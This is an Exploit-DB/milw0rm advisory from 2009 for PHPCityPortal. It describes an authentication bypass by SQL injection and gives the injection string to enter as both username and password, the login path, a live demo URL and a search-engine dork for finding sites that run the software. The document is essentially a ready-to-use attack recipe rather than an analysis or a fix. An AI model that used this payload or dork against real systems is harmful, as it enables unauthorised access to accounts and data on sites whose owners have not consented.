PHPCityPortal - Authentication Bypass

EDB-ID:

9395


Author:

CoBRa_21

Type:

webapps


Platform:

PHP

Date:

2009-08-07


******************************************************************************************
Script Name: PHPCityPortal (Auth Bypass) SQL Injection Vulnerability
 
Author:   CoBRa_21
 
Mail:    uyku_cu@windowslive.com
 
Script Page:  http://phpcityportal.com/
 
DOrk:    intext:"Powered by PHPCityPortal.com"
 
******************************************************************************************
EXPLOIT
 
Username: 'or'
 
Password: 'or'
 
http://localhost/[path]/login.php
 
Demo: http://phpcityportal.com/demo/login.php
 
******************************************************************************************

# milw0rm.com [2009-08-07]